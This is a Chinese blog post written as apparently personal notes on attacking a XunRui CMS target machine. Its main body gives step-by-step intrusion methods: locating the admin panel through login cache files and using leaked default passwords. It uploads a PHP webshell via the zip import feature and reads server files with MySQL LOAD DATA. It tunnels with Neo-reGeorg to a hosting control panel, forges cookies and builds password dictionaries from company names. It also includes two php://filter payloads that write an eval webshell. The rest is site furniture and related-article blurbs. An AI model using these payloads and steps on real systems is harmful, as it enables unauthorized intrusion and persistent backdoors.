迅睿CMS漏洞思考

已于 2024-01-26 13:26:42 修改
阅读量1.5k 收藏 3
点赞数 2
文章标签: 网络安全
于 2023-04-26 22:13:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35013491/article/details/130395016
版权

遇到个靶机是迅睿CMS :

某CMS漏洞总结_长白山攻防实验室的博客-CSDN博客

后续补充:

一:后台地址

默认后台为/admin.php

遇到的靶机是/houtai.php

目标旁站存在备份 版本为5. 4,靶机也存在备份,版本为5.1

旁站情况:网站根目录下存在 /www.zip

里面数据库配置信息和后台地址都是假的,

/tool/login.php  是迅睿工具箱地址 这个的密码是 wangbiao88,登录进去可修改后台密码,后面找到后台后一样的密码。

第一步:找后台地址:

默认地址和扫目录没发现后台地址但发现个/houtai/的目录路径 就是没去试/houtai.php

/houtai.php 这个后台路径是在

/cache/log/202206/04.php   (按照年月/日期)如果登录了不管成功和失败就会生成缓存文件,密码错误会记录错误的md5密码,不管成功失败都会记录显示用户名登录。我遇到成功了也记录了。

通过此文件成功找到后台地址。

默认用户名admin   密码就是泄露的迅睿工具箱源代码中的密码 \tool\config\pwd.php

二:旁站拿shell

后台拿shell:后台"应用"->“联动菜单”->"导入"处可上传zip文件

本地新建一个123文件夹 再建立一个123文件夹 再放入你的shell.php

压缩之后 --导入  

shell路径:抓包会返回 目录 一般为

/cache/temp/linkage-import-file-1-1/123/123/shell.php 

/cache/temp/linkage-import-file-1-2/123/123/shell.php 

/cache/temp/linkage-import-file-1-3/123/123/shell.php 

三:尝试提权

拿到webshell之后。护卫神,不支持aspx及aspx php很多马都杀,不能执行命令,反弹也执行不了。不能直接跨站,

mysql数据库低权限也不能都文件。

1.  CREATE TABLE `bbs` (`bbs1` TEXT NOT NULL ); 

2.  load data local infile '//home//opendb.php' into table bbs;

3.  LOAD DATA LOCAL INFILE '/home/opendb.php' into table bbs fields terminated by '' LINES TERMINATED BY '\0';   (转义用这个)

网上护卫神主机提权, 那个6588端口(直接访问是访问不到的需要做socks代理),php文件获取session 伪造cookie  3x版本应该可以,目标4x版本测试了不行。

过程:上传Neo-reGeorg

生成python neoreg.py generate -k pass@123 生成socks5  shell 上传目标服务器

 python neoreg.py -k pass@123 -u http://www.abcd.com/cache/temp/linkage/import-file-1-2/cc/cc/tunnel.php  (本机执行)

安装Proxifier --  127.0.0.1  1080  选择浏览器进程,范围为,内网ip或目标范围(本机配置)

浏览器输入 目标地址:6588 即可成功访问 护卫神 控制台

低版本默认 管理帐户:huweishen  管理密码:huweishen.com

高版本的是随机的强密码。

利用护卫神 那个php脚本获取到cookie是随机的,3x版本应该可以,4x不行。

修改cookies 可以使用浏览器cookies插件,也可以使用 

浏览器 按F12  输入document.cookie 会显示cookies值 

输入 document.cookie="获取到cookies  还有path值"  回车 F5刷新即可修改cookies了。

四:目标情况。

目标情况:网站根目录也存在备份/backupdata.zip  但是dedecms的信息,没啥用

其实:网站后台登录会记录内容写缓存到php文件,文件路径为:/cache/log/202206/04.php(按照年月/日期)闭合了但是被转义了,没能getshell,

按照别人总结的版本提示文件不存在,也没拿到shell,

迅睿工具箱地址也没有,后台是猜进去的。

按照旁站的版本,构造一样的包提示的,导入不能getshell  少导入那个upload模块。(旁站是import_upload) 这个版本没有只有import

旁站尽量搞.net的站点。

还有一个社工密码生成的规则。

公司名:如湘潭创荣经济发展集团有限公司 :密码就是chuangrou88 且存在用户名chuangrou
那么他可能的用户名有:

xtcf

xtcr

chuangfa

chuangrou

湘潭网丹互联网集团有限公司官网:密码就是wangdan88
wdjt
wangdan
xtwd

根据关键字组合去生成弱口令字典

补充:PHP文件上传绕过-死亡exit.txt

https://www.equinox.chat/archives/28/

payload1:

txt=aPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=convert.base64-decode/resource=shell.php

payload2:

txt=PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

低调求绕过,没事写博客
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
迅睿CMS免费开源系统-PHP
06-20
迅睿CMS免费开源系统是基于PHP8语言采用最新CodeIgniter4作为开发框架生产的网站内容管理框架,提供“电脑网站 + 手机网站 + APP 接口”一体化网站技术解决方案。她拥有强大稳定底层框架,以灵活扩展为主的开发理念,二次开发方便且不破坏程序内核,为 WEB 艺术家创造的 PHP 建站程序,堪称 PHP 万能建站框架。 迅睿CMS免费开源系统特点: 一、程序架构 迅睿CMS框架是采用PHP8全新语法开发的web内容管理系统开发框架,拥有迅睿CMS强大的内容管理功能和灵活扩展的特性,堪称 PHP 万能建站框架。强大而灵活的内容模块和插件机制,开发者可以自定义内容模块,也可以根据自身的需求以插件的形式进行扩展。 迅睿CMS框架采用最新CodeIgniter4框架,拥有完善的二次开发文档,并且遵循框架原生编程风格,非常方便二次开发;CodeIgniter 安装包中包含《用户手册》,手册囊括了入门介绍、教程、“手把手”指导,还包括了框架组件的参考文档。 二、效率与安全 1、运用全新PHP8语法特性,设计时考虑到性能优化,运行效率高达4倍于PHP5系列开发环境 2、运用CI框架的扩展性和路由模式,加上ZF框架强大丰富的中间件和扩展包,大大提高系统的扩展性能 3、Zend框架官方全部扩展包支持自由引入本系统,按需加载模式,最大限度地提高开发效率 4、利用ZF提供的与安全相关的组件,包括 SQL 注入、XSS、CSRF、垃圾邮件和密码暴力破解攻击 5、动态缓存技术让动态页面新增支持缓存,让采用动态页面模式的网站访问速度更快,效率更高 6、全站支持HTTPS传输协议,更安全,支持小程序数据请求的URL规范 7、表单增加“csrf_token”验证功能,防护更强 三、多插件机制 框架采用多个Module作为App应用,迅睿CMS继续沿用此设计模式,并且支持多个App插件化。 1、插件目录结构:dayrui/App/***/。 2、插件支持独立运行。 3、插件内部结构遵循CI4App规则。 四、自定义CI扩展类 迅睿CMS在不破坏CI4框架本身的情况下,进行了扩展CI自带的类库。 1、重写CI错误异常显示类,中国化。 2、重写路由类,符合国内建站程序的URL结构,如:c=控制器&m=方法名&id=参数。 3、重写钩子类,CI4钩子类会加载所有App中的自定义钩子,App数量过多时会影响速度,迅睿CMS提出全局钩子配置文件。 4、重写安全类,强化过滤非法字符串。 五、模板解析类(视图) CI4本身的模板解析类不太灵活,迅睿CMS采用天睿自主研发天睿模板引擎技术,MVC设计模式实现业务逻辑与表现层的适当分离,使网页设计师能够轻松设计出理想的模板。 1、支持原生态PHP语法特性。 2、支持CI框架语法结构。 3、{变量}自定义系统标签语法结构。 4、模板缓存,只需要一次解析,提升性能。 六、自定义扩展类目录 迅睿CMS有全局Library目录,专门用于扩展类库,与Librarys用法不太一样,但原理一样。 1、全局Library调用。 2、可继承全局Library函数类。 3、App有自己独立的Library函数类。 4、跨App支持调用任意App的Library函数类。 七、网站模板机制 CI4不具备终端识别模式,迅睿CMS增加多终端识别和自定义终端显示。 1、迅睿CMS模板分为手机端和电脑端。 2、后台可以直接编辑网站模板和手机模板。 3、编辑模板自动备份,以免老模板丢失。 4、编辑模板时自动检测模板语法是否正确。 5、为模板文件中文命名,以免快速区分。 八、万能Table类 迅睿CMS框架为开发者准备了万能的Table类,此类用于对数据表的增删改查操作,只需要配置文件,逻辑功能由迅睿CMS来帮你完成。 1、支持任意表数据展示。 2、多表联合查询。 3、自定义字段格式入库规则。 九、自定义字段 迅睿CMS采用非常成熟的自定义字段方案,可以支持到栏目表自定义字段、内容表自定义字段、表单表自定义字段、用户表自定义字段、评论表自定义字段、页面表自定义字段、链接表自定义字段、tag表自定义字段等。 1、文本字段,有单行文本、多行文本、文本事件字段 2、上传字段,有单文件上传、多文件上传 3、日期时间字段,支持自定义年月格式显示 4、联动菜单字段,用于无限分类层级显示的数据,例如城市 5、百度地图字段,用于定位地图坐标,坐标范围内筛选数据 6、富文本字段,百度编辑器、百度移动编辑器 7、选项字段,单选字段、多选字段、下拉选择字段 8、颜色字段,用于选择网页颜色值 9、属性字段,用于类似于商品属性的数据 10、内容关联字段,用于加载其他模块内容的字段,例如专题功能 11、价格字段,用于CMF站内购物交易,例如文章买卖、下载收费 12
XunRuiCMS-V4.3.13-2021-01-24_xunrui_
10-01
迅睿开源建站cms系统,是非常好的一款建设企业网站的系统
PbootCms-3.04前台RCE挖掘过程1
08-03
是借鉴了第篇章的某些思路。接着直接来看代码,先标仍然是解析 if 标签的代码块,看下三个正则相对于上个版本来说,第三条正则多了 (\([\w\s\.]+\))
迅睿CMS插件免费下载汇集所有SEO功能
02-13
迅睿CMS插件,免费迅睿CMS插件,无需写入规则输入关键词即可采集全自动采集伪原创发布推送的插件,自动内链,关键词插入,自动配图等。
迅睿CMS免费开源系统
08-17
迅睿CMS开源系统是基于PHP7语言采用最新CodeIgniter4作为开发框架生产的网站内容管理框架,提供“电脑网站 + 手机网站 + APP 接口”一体化网站技术解决方案。她拥有强大稳定底层框
CMS漏洞总结
include_voidmain的博客
08-01 4321
CMS漏洞总结
CMS漏洞复现
x594238758的博客
09-10 3351
CMS是英语Content Management System的缩写,按英语的字面翻译就是内容管理系统,顾名思义,它主要是为了方便发布网络内容而存在的一体化Web管理系统。很久很久以前,人们做网站很多用静态HTML+CSS+Javascript直接写,也就是静态页面。
迅睿CMS安全性怎么样?如何进行安全设置
迅睿CMS开源建站程序
08-13 863
一、迅睿CMS安全性 1、系统后台安全设置 开启https、开启跨站验证、登录失败次数设置 定期修改密钥,该密钥用于Cookie数据加密,为了保证用户数据安全 2、目录权限(非常重要) 目录权限的配置非常重要,80%的网站系统入侵后成功挂马,基本上是权限设置不正确引起的。 迅睿CMS系统目录权限配置的原则为: 可执行PHP脚本的目录,不允许可写 可写的目录,不允许执行PHP脚本 这样即使黑客侵入了网站目录,也不能轻易让木马在可执行PHP脚本的目录下运行,相当于把木马文件隔离起来了。 3、分离后台程序,个性化
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1629
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
最新发布
Javachichi的博客
10-29 1768
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现。
迅睿CMS免费开源系统 v4.3.7
08-20
迅睿CMS开源系统是基于PHP7语言采用最新CodeIgniter4作为开发框架生产的网站内容管理框架,提供“电脑网站 + 手机网站 + APP 接口”一体化网站技术解决方案。她拥有强大稳定底层框
迅睿cms短信插件_迅睿短信接口开发_cms系统短信发送设置
02-11
迅睿cms短信插件_迅睿短信接口开发_cms系统短信发送设置
2023红明谷wp web方向
GXcodes的博客
04-19 653
2023红明谷 wp web方向
迅睿CMS 框架介绍
08-14 542
XunRuiCMS就是程序框架,每一个CMS项目的框架文件相同,XunRuiCMS目录一般是: 框架程序文件由以上红线的目录构成,也就是除开My和App目录,其他文件都是XunRuiCMS的文件 本文地址:https://www.xunruicms.com/doc/538.html ...
正确的加密存储密码防止被拖库(脱裤)保护用户登录安全
青茶
08-14 1459
在日常的开发中对密码的处理一般只是简单的做一下MD5,甚至有的系统直接存储用户的明文密码,如果一旦被黑客拖库,整个数据库被下载走,那黑客可以登录任意一个账户做出危险的操作,甚至无法弥补的事故,所以要正确的加密密码,保护用户账户的安全。...
帝国cms v7.5---漏洞分析
2201_76017178的博客
05-25 5532
帝国CMS漏洞分析,解析EmpireCMSv7.5存在的漏洞以及漏洞的复现
某小众CMS漏洞挖掘与实战
热门推荐
江左盟的博客
09-11 1万+
概述 在前段时间实战攻防演练中发现很多医院都使用同一个管理系统,网站后台都是同一路径:/adm/index.php,但是我从未见过,且页面没有任何Banner信息,如图: 通过许久的搜索终于找到了一些极其相似的源码,但都没有源码来源,其中有一套来自网软志成医院科室诊所门诊部网站系统源码,现在也下架了。还好我有备份:点击下载 环境搭建 运行环境使用Windows Server 2008 R2 64位和phpstudy进行搭建。部分源码已使用Zend加密,因此使用Zend解密工具进行解密,如图: 在安装过程
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 6791
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8212
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
迅睿cms微信抖音小程序生成管理系统v1.0开源
07-30
迅睿CMS微信抖音小程序生成管理系统V1.0是一款开源的系统,旨在帮助用户轻松生成和管理微信抖音小程序。这个系统具有以下特点: 1. 开源:迅睿CMS微信抖音小程序生成管理系统是开源的,用户可以获取源代码并根据自己的需求进行定制和修改。 2. 生成小程序:该系统可以快速生成微信抖音小程序,用户只需填写相关信息和上传对应素材,系统将自动生成小程序代码。 3. 小程序管理:迅睿CMS微信抖音小程序生成管理系统提供了小程序管理功能,用户可以对已生成的小程序进行修改和更新,方便维护和管理。 4. 界面友好:系统拥有直观简洁的用户界面,操作简单明了,即使没有编程经验的用户也能轻松上手。 5. 多平台支持:该系统支持微信和抖音平台的小程序生成,用户可以根据需要选择发布到不同的平台。 6. 功能丰富:迅睿CMS微信抖音小程序生成管理系统提供了丰富的功能,包括用户管理、内容管理、数据统计等,满足用户多样化的需求。 7. 扩展性强:系统允许用户根据自己的需求进行定制和扩展,可以添加自定义的功能模块和插件。 总体来说,迅睿CMS微信抖音小程序生成管理系统V1.0是一款开源、功能丰富且易于使用的系统,帮助用户简化小程序的生成和管理过程,满足用户不同的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值